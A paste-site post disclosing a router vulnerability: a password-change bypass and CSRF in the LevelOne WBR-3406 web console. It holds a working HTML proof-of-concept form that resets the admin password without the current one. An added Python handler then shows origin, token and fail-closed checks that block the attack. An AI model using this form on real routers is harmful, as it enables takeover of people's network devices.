WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability


SUBMITTED BY: Guest

DATE: Nov. 24, 2013, 11:39 p.m.


# -----------------------------------------------------------
# WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability
# This PoC code should do two main things:
# 1. Cross Site Request Forgery (For more information, just google it).
# 2. Change the password to a new one without knowing the current password.
# The vulnerability works as follows: if the "PA=" parameter, which carries the current password,
# is removed from the request, the application ignores its absence and changes the password
# without the old / current password ever being entered.
# Bug discovered by Pr0T3cT10n AKA Yakir Wizman, <yakir.wizman@gmail.com>
# Date 17/08/2012
# Vendor site - http://www.level1.com/
# ISRAEL
# -----------------------------------------------------------
# The author is not responsible for any damage.
# -----------------------------------------------------------
# PoC EXPLOIT
# -----------------------------------------------------------
<html>
<body>
<form action="http://192.168.123.254/cgi-bin/pass" method="POST">
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# -----------------------------------------------------------
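A server-side handler that would reject the request above, added here as an example; it is not code from the original post or from the vendor's firmware. It assumes "PA" is the current password as the post states, that "Pa" and "P1" are the new password and its confirmation, and a hypothetical per-session "csrf" form field; all function and variable names are illustrative.

```python
import hashlib
import hmac
import secrets

ROUTER_ORIGIN = "http://192.168.123.254"  # host taken from the PoC's form action


def hash_pw(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def change_password(form: dict, headers: dict, session: dict, store: dict):
    """Return (status, reason); `store` holds the admin password's salt and hash."""
    # CSRF check 1: a form posted from another site carries a foreign Origin.
    if headers.get("Origin") != ROUTER_ORIGIN:
        return 403, "bad origin"
    # CSRF check 2: per-session token (hypothetical "csrf" field) that a
    # third-party page cannot read and therefore cannot submit.
    sent, want = form.get("csrf", ""), session.get("csrf", "")
    if not sent or not hmac.compare_digest(sent.encode(), want.encode()):
        return 403, "bad csrf token"
    # Fail closed: a missing or empty PA is a failed check, not a skipped one.
    current = form.get("PA")
    if not current:
        return 403, "current password required"
    if not hmac.compare_digest(hash_pw(current, store["salt"]), store["hash"]):
        return 403, "current password incorrect"
    # Assumption: Pa is the new password and P1 its confirmation.
    new, confirm = form.get("Pa", ""), form.get("P1", "")
    if not new or new != confirm:
        return 400, "new password mismatch"
    store["salt"] = secrets.token_bytes(16)
    store["hash"] = hash_pw(new, store["salt"])
    session["csrf"] = secrets.token_hex(16)  # rotate the token after use
    return 200, "password changed"


def demo():
    # Constructed requests run against a fresh, constructed admin account.
    salt = secrets.token_bytes(16)
    store = {"salt": salt, "hash": hash_pw("old-admin-pw", salt)}
    session = {"csrf": secrets.token_hex(16)}
    poc = {"rc": "@", "Pa": "1234567", "P1": "1234567", "rd": "atbox"}  # PoC fields
    same_site = {"Origin": ROUTER_ORIGIN}
    with_token = dict(poc, csrf=session["csrf"])
    return [
        change_password(poc, {"Origin": "http://other.example"}, session, store),
        change_password(with_token, same_site, session, store),  # still no PA
        change_password(dict(with_token, PA="old-admin-pw"), same_site, session, store),
    ]
```

The second request in `demo()` shows that passing the CSRF checks is not enough: without "PA" the change is refused rather than silently applied.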
